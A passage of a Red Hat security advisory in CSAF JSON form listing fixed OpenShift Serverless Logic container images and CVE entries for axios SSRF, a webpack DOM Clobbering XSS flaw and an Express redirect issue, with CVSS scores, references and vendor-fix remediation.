"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
